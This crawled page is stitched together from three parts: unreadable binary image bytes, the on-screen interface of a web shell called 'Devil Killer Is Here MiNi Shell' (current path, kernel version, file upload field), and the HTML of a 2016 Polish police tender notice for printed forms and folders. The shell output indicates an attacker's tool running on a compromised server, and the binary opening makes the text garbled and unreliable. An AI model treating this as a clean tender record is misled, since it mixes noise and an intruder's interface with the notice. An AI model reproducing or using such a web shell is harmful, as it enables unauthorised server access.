JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160509/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160509/115420-N-2016.html

<p class="kh_header"><b>Radom: Zakup i dostawa druków, formularzy resortowych, tarcz i obwolut dla KWP zs. w  Radomiu i jednostek podległych - nr postępowania 27/16</b><br>
<b>Numer ogłoszenia: 115420 - 2016; data zamieszczenia: 09.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji z siedzibą w Radomiu , ul. 11 Listopada 37/59, 26-600 Radom, woj. mazowieckie, tel. 48 3453103, faks 48 3452002.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.mazowiecka.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa druków, formularzy resortowych, tarcz i obwolut dla KWP zs. w  Radomiu i jednostek podległych - nr postępowania 27/16.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  zakup i dostawa druków, formularzy resortowych, tarcz i obwolut dla KWP zs. w  Radomiu i jednostek podległych.
Opis techniczny postaci wydawniczej książek i zeszytów wykonanych na papierze offsetowym:Książki różnego formatu w oprawie twardej, równo ciętej, półpłóciennej szyte nićmi lub drutem w grzbiecie oraz klejone klejem introligatorskim. Okładka wykonana z tektury introligatorskiej 
o gramaturze 800-900g/m2 lub z tektury klasy Alaska o gramaturze 450 550 g/m2
(i jej sztywności), oklejona marmurkiem w kolorze ciemnym lub z kolorowym nadrukiem (jeden kolor); wyklejka niezadrukowana; grzbiet prosty, laminowany płótnem introligatorskim, środki wydrukowane w kolorze czarnym (1+1), na papierze offsetowym o gramaturze 80 g/m2. Tytuł książki na naklejce formatu A-6 na pierwszej stronie okładki.  W pozycjach, które dotyczą książek podana jest ilość kartek.
Opis techniczny postaci wydawniczej bloczków wykonanych na papierze offsetowym:
Bloczki zadrukowane jednostronnie lub dwustronnie (zgodnie ze wzorem druku) drukiem koloru czarnego, kartki wykonane z papieru offsetowego wyłącznie w kolorze białym gramatury 80 g/m2, klejone klejem introligatorskim po krótszym lub dłuższym boku, posiadające usztywnienie od spodu z kartonu 200-230 g/m2 i przekładkę z kartonu 200-300 g/m2. Bloczek składa się odpowiednio z 50 lub 100 kart. 
Opis techniczny postaci wydawniczej bloczków wykonanych na papierze samokopiującym formatu: A4, A5, A6:
Bloczki zadrukowane jednostronnie drukiem koloru czarnego, kartki wykonane 
z papieru samokopiującego CFB w różnych kolorach (oryginał + kopie) gramatury 50-60 g/m2, klejone klejem introligatorskim po krótszym boku, posiadające usztywnienie od spodu z kartonu 200 -230 g/m2. Bloczek składa się odpowiednio z 50 kart lub 100 kart. 
Opis techniczny: Notatnik służbowy  Mp-11
Książka formatu 100 x 130 mm szyta nićmi oraz klejona klejem introligatorskim, 
zawierająca 64 kartki, oprawa broszurowa, okładka bez nadruku wykonana z kartonu  białego, gładkiego, gramatury 220 - 250g/m2, bigowanie na grzbiecie cztery razy, środki wykonane 
z papieru offsetowego gramatury 80g/m2, zadrukowane dwustronnie identycznymi tabelami rozwartymi, paginacja stron, pokrycie farbą ok. 4%.
Opis techniczny: Pocztowa Książka Nadawcza Kn-8/s
W formacie 2-3 A-4, zeszyt 50 kart, zadrukowany jednostronnie drukiem koloru czarnego, kartki wykonane z papieru samokopiującego CFB wyłącznie w kolorze białym gramatury 50-60 g/m2, klejone klejem introligatorskim po krótszym boku, posiadające usztywnienie od spodu z kartonu 200-230 g/m2. Bloczek składa się odpowiednio z 50 kart lub 100 kart.
Opis techniczny: Go-1, Go-1a, Go-2, Go-2a
 Bloczki formatu A-4 lub A-5, zadrukowany dwustronnie drukiem koloru   
 czarnego, 100 kart, kartki wykonane z papieru PELUR o gramaturze 60g/m2,   
 klejone klejem  introligatorskim, posiadające usztywnienie z kartonu 200-23 g/m2.
Opis techniczny: Akta dochodzenia- śledztwa Ms-49
Teczka formatu 32cm x 63cm wykonana z kartonu kremowego jednostronnie gładzonego, gramatury 250g/m2. Grzbiet teczki dziurkowany dwukrotnie po dwa  otwory. Teczka posiada 
11 bigów. Do każdej teczki oddzielnie tj. bez wpinania w otwory, dołożyć należy po jednym komplecie metalowych blaszek i wąsów (do wpinania dokumentów). Druk dwustronny koloru czarnego, pokrycie farbą ok. 2%. Grzbiet teczki zadrukowany paskiem w kolorze czarnym, szerokości 6 cm.
Opis techniczny do:
 - Makiety do materiałów poglądowych z dokonanych czynności (Mek-3): teczka., 84cm x 30cm, gramatura w g/m2 -250, druk dwustronny, karton kredowany, bigowanie
 - Makiety do materiałów poglądowych ekspertyz kryminalistycznych (Mek-4): teczka., 43cm x 30cm, gramatura w g/m2 -250, druk dwustronny, karton kredowany, bigowani
- Dokumentacja fotograficzna (Mek-15): teczka., 42cm x 30cm, gramatura w g/m2 -250, 
 druk dwustronny, karton kredowany, bigowanie
- Materiał poglądowy(Mek-16): teczka., 42cm x 30cm, gramatura w g/m2 -250, druk    dwustronny, karton kredowany, bigowanie
Opis techniczny: Teczka poszukiwania/identyfikacji   Pkr-22
Teczka formatu 32cm x 62cm wykonana z kartonu kremowego, jednostronnie gładzonego, gramatury 250g/m2. Druk dwustronny koloru czarnego. Grzbiet teczki dziurkowany dwukrotnie po dwa otwory. Na skrzydełku teczka posiada 3 bigi. Do każdej teczki oddzielnie tj. bez wpinania w otwory, dołożyć  należy po jednym komplecie blaszek i wąsów (do wpinania dokumentów).
Opis techniczny: Teczka rejonu  dzielnicowego (kolor niebieski)  MP - 8
Okładka wykonana z tektury 2mm. Pierwsza i czwarta strona okładki oklejona kartonem jednostronnie kredowym w kolorze niebieskim o gramaturze 120g/m2, pokryta lakierem UV. Wszystkie rogi okładki (pierwsza i czwarta strona) zabezpieczone płótnem  kanafas w kolorze granatowym wpuszczonym pod okleinę, o wymiarach 3,5cm x 3,5cm. Na trzeciej stronie okładki umieszczono pod okleiną w układzie pionowym stosowne skrzydełka o wymiarach 14,5cm 
x 15,5cm, bigowanie co 1 cm umożliwiające wpięcie dokumentów zamykanych na tasiemki. Połączenie przedniej i tylnej okładki z grzbietem wzmocnione jest dwoma nitami (u góry i u dołu). Teczka zamykana na tasiemki w połowie prawego dłuższego boku. Przegródki (6 sztuk) 
o formacie 21,5cm x 32cm wykonane są z kartonu w kolorze białym o gramaturze220g/m2, zadrukowane jednostronnie tekstem czarnym,  trwale połączone z grzbietem teczki (poza pierwszą przegródką wszystkie pozostałe pokryte są jednostronnie lakierem UV). Grzbiety okładki wykonane z płótna (kanafas w kolorze granatowym) przyklejone do przegródek od strony zewnętrznej. Grzbiet tworzy harmonijkę dostosowująca się do objętości teczki. Skrzydełka 
(7 szt.) wykonane z tego samego kartonu, co i same przegródki, posiadają dwie dziurki do wkładania blaszek i wąsów, położone 1cm od lewej krawędzi umożliwiającej wpięcie dokumentów:
a)	pierwsze skrzydełko umieszczone jest przed pierwszą stroną rozdziałową,
b)	drugie skrzydełko tworzy objętość pierwszego rozdziału (1cm),
c)	trzecie skrzydełko tworzy objętość drugiego rozdziału (1cm),
d)	czwarte skrzydełko tworzy objętość trzeciego rozdziału (1cm),
e)	piąte skrzydełko tworzy objętość czwartego rozdziału (1cm),
f)	szóste skrzydełko tworzy objętość piątego rozdziału (1cm),
g)	siódme skrzydełko tworzy objętość szóstego rozdziału (1cm),
Format teczki - 23cm x 33cm.
Opis techniczny: Akta osobowe kolor zielony Ke-10
Format teczki - 22cm x 31cm
6 kpl. blaszek i wąsów stanowi komplet do wpinania dokumentów.
Okładka wykonana z tektury, pierwsza i czwarta strona okładki oklejona jest papierem jednostronnie kredowym w kolorze zielonym o gramaturze 120g/m2, pokrytym lakierem UV, wszystkie rogi zewnętrzne okładki (pierwsza i czwarta strona) zabezpieczone płótnem KANAFAS w kolorze zielonym, wpuszczone w okleinę o wymiarach 3,5cm 
x 3,5cm. Pierwsza i druga strona okładki zadrukowane drukiem w kolorze czarnym.                                    
Połączenie przedniej i tylnej okładki z grzbietem wzmocnione dwoma nitami (u góry 
i u dołu), Przegródki (3szt.) o wymiarach 22cmx33cm wykonane z kartonu koloru białego 
o gramaturze 220g/m2, zadrukowane dwustronnie tekstem koloru czarnego, trwale połączone z grzbietem teczki. Grzbiet okładki wykonany z płótna KANAFAS w kolorze zielonym przyklejony do przegródek od strony zewnętrznej, grzbiet tworzy harmonijkę dostosowującą się do objętości teczki. Skrzydełka (trzy sztuki) wykonane z tego samego kartonu co przegródki (zagięte w podwójny karton w skrzydełku) posiadają 4 dziurki rozmieszczone stosownie do układu blaszek i wąsów, położone 1cm od krawędzi umożliwiając wpięcie dokumentów,
a)pierwsze skrzydełko umieszczone jest bezpośrednio za pierwszą przegródką i tworzy objętość pierwszego  rozdziału (1cm)
b)drugie skrzydełko umieszczone jest bezpośrednio za drugą przegródką i tworzy objętość drugiego rozdziału (1cm)
c)trzecie skrzydełko umieszczone jest bezpośrednio za trzecią przegródką i tworzy objętość trzeciego rozdziału (1cm)
Opis techniczny:
Akta postępowania sprawdzającego kolor niebieski  Ke-80/a
Akta postępowania sprawdzającego kolor czerwony Ke-80/c 
Akta postępowania sprawdzającego kolor pomarańczowy Ke-80/d
Okładka wykonana jest z tektury 2mm. Pierwsza i czwarta strona okładki oklejona kartonem, jednostronnie kredowanym w stosownym do rodzaju teczki kolorze (niebieski, czerwony, pomarańczy) o gramaturze 120g/m2, pokryte lakierem UV.  Wszystkie rogi okładki (pierwsza i czwarta strona) zabezpieczone płótnem KANAFAS w kolorze czarnym, wpuszczonym pod okleinę o wymiarach 3,5 x 3,5cm. Pierwsza strona okładki zadrukowana tytułem w kolorze czarnym oraz z umieszczoną centralnie w dolnej części strony poziomą, samoprzylepną kieszonką plastikową wraz z wkładką do opisu teczki stanowiącą prostokąt o wymiarach 10,5 x 3,5cm. Połączenie przedniej i tylnej okładki z grzbietem wzmocnione jest dwoma nitami (u góry i u dołu). Teczka zamykana na stosowną gumkę po prawym dłuższym boku. Mocowanie gumki do tylnej okładki musi umożliwić jej łatwą wymianę w razie zerwania. Przegródki (2szt.) o formacie 22 x 32cm, wykonane są z kartonu w kolorze białym o gramaturze 220g/m2, zadrukowane dwustronnie tekstem czarnym, trwale połączone z grzbietem teczki. Grzbiet okładki wykonany z płótna KANAFAS w kolorze czarnym przyklejony do przegródek od strony zewnętrznej. Grzbiet tworzy harmonijkę dostosowującą się do objętości teczki. Skrzydełka (6 sztuk) wykonane z tego samego kartonu co i same przegródki, posiadają dwie dziurki do wkładania blaszek i wąsów, położone 1cm od lewej krawędzi umożliwiające wpięcie dokumentów:
       - pierwsze skrzydełko umieszczone jest przed pierwszą stroną rozdziałową,
       - drugie skrzydełko tworzy objętość pierwszego rozdziału 2cm,
       - trzecie skrzydełko umieszczone jest bezpośrednio za drugim skrzydełkiem,
       - czwarte skrzydełko umieszczone jest bezpośrednio za trzecim skrzydełkiem,
       - piąte skrzydełko tworzy objętość środkowego rozdziału 4cm,
- szóste skrzydełko tworzy objętość ostatniego rozdziału 1cm.
  Format teczki - 23 x 33cm.
   Do każdej teczki mają być wpięte w stosowne miejsca:
- trzy kartki luzem w formacie 22 x 32cm, wykonane z kartonu w kolorze białym o gramaturze 140-160g/m2, zadrukowane dwustronnie tekstem czarnym,
 posiadające dwie dziurki do wkładania blaszek i wąsów położone 1cm od lewej krawędzi, umożliwiające jej wpięcie do teczki.
- jedna kartka luzem wykonana z tego samego kartonu co przegródki i w tym samym 
formacie , zadrukowana jednostronnie tekstem czarnym, posiadające dwie dziurki do wkładania blaszek i wąsów położone 1cm od lewej krawędzi, umożliwiające jej wpięcie do teczki.
- blaszki i wąsy 6 sztuk stanowią komplet do wpinania dokumentów.
Opis techniczny: Akta osobowe pracownika Policji 
Teczka, format B4, o gramaturze 250g/m2, karton kredowany, bigowanie
Opis techniczny do teczek 
Teczka, format 32cm x 50cm (w tym grzbiet teczki - szerokość 6cm), wykonana 
z kartonu kremowego, jednostronnie gładzonego, o gramaturze 250g/m2, grzbiet teczki dziurkowany dwukrotnie po 2 otwory, bigowanie. Do każdej teczki oddzielnie tj. bez wpinania w otwory, należy dołożyć po jednym komplecie metalowych blaszek i  wąsów. Druk jednostronny, koloru czarnego.
Opis techniczny do rejestrów
Książka, format A4, 100 kart, oprawa twarda równo ciętej, szytej nićmi lub drutem 
w grzbiecie oraz klejona klejem introligatorskim, okładka wykonana z tektury introligatorskiej o gramaturze 800-900g/m2 lub z tektury klasy Alaska o gramaturze 450-550g/m2 (i jej sztywności), oklejona marmurkiem w kolorze ciemnym lub z kolorowym nadrukiem (jeden kolor), wyklejka niezadrukowana, grzbiet prosty, laminowany płótnem introligatorskim, środki wydrukowane w kolorze czarnym na papierze offsetowym o gramaturze 80g/m2. Tytuł książki na pierwszej stronie okładki na naklejce formatu A6.
Opis techniczny do teczek okolicznościowych
Wykonanie w formacie 216mm x 305mm z bigowaniem, w kolorze ciemny granat 
ze szlachetnego i ozdobnego kartonu fakturowanego w linie poziome o gramaturze 300g/m2. teczka zawiera na stronie zewnętrznej wytłoczonego orła (w polu około 40mm x 42mm) oraz srebrny tekst wykonany metodą nadruku offsetowego (w polu około 160mm x 21mm) - napis w dwóch różnych wersjach. Wewnątrz posiada zakładkę sztancowaną, doklejaną, podtrzymującą dokumenty.
Dostawy druków, formularzy resortowych, tarcz i obwolut następować będą transportem własnym Wykonawcy wraz z rozładunkiem, na jego koszt, w miejsce uwzględnione w załączniku nr 2  i wskazane w zamówieniu otrzymanym od Zamawiającego, w dni robocze tj. od poniedziałku do piątku w godzinach od 8.00 do 14.00.
Zamawiający zastrzega sobie prawo do zmiany wzorów druków, formularzy resortowych, tarcz, obwolut w trakcie trwania umowy na aktualnie obowiązujące zgodnie z obowiązującymi 
w tej mierze przepisami. 
TERMIN WYKONANIA ZAMÓWIENIA:
Termin realizacji  zamówienia : od dnia 22.10.2016 r.  do dnia 22.10.2018 r..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 22.90.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.10.2018.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie uszczegóławia tego warunku. Do oferty należy dołączyć oświadczenie o spełnianiu warunków wymaganych w art. 22 ust. 1.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie uszczegóławia tego warunku. Do oferty należy dołączyć oświadczenie o spełnianiu warunków wymaganych w art. 22 ust. 1.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie uszczegóławia tego warunku. Do oferty należy dołączyć oświadczenie o spełnianiu warunków wymaganych w art. 22 ust. 1.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie uszczegóławia tego warunku. Do oferty należy dołączyć oświadczenie o spełnianiu warunków wymaganych w art. 22 ust. 1.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie uszczegóławia tego warunku. Do oferty należy dołączyć oświadczenie o spełnianiu warunków wymaganych w art. 22 ust. 1.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dysponowania niezbędnych zasobów na potrzeby wykonania zamówienia. 2) Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. III.4.3.1, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem przy zachowaniu terminu wystawienia wymaganego dla tego rodzaju dokumentu. 3) W przypadku udzielenia pełnomocnictwa - oryginał pełnomocnictwa lub kopia poświadczona przez notariusza. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia wymagane jest określenie pełnomocnika do ich reprezentowania w postępowaniu, albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Oryginał pełnomocnictwa lub notarialnie potwierdzona kopia, z którego musi wynikać zakres umocowania dla pełnomocnika ustanowionego przez wykonawców wspólnie ubiegających się o udzielenie zamówienia, należy załączyć do oferty. 4) Formularz ofertowy wraz z zawartą informacją o przynależności do grupy kapitałowej, 5) Wykaz - cennik asortymentowo- ilościowy - zgodny z załącznikiem nr 1 do siwz, stanowiący integralną część formularza ofertowego</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin dostawy częściowej - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.)	Zamawiający może w ramach wykonania umowy zamówić mniejszą od przewidywanej ilość asortymentu, nie mniej jednak niż 80% przewidywanej ilości towaru. Odpowiedniemu zmniejszeniu ulegnie wówczas wynagrodzenie, a Wykonawcy z tego tytułu nie będą przysługiwać wobec Zamawiającego żadne roszczenia.
2.)	Zamawiający zastrzega sobie prawo do zmian ilości i opisu technicznego asortymentów wyszczególnionych w załącznikach nr 1, który stanowi integralną część umowy, a wynikających ze zmian przepisów dotyczących  druków,  formularzy  resortowych, tarcz i obwolut.
3.)	W przypadku konieczności dokonania zakupu druków w terminie wcześniejszym
 niż wskazany § 3 ust. 1 wzoru umowy strony przewidują możliwość zmiany dat początkowych 
i końcowych obowiązywania umowy przy zachowaniu 24 miesięcy jej  obowiązywania.
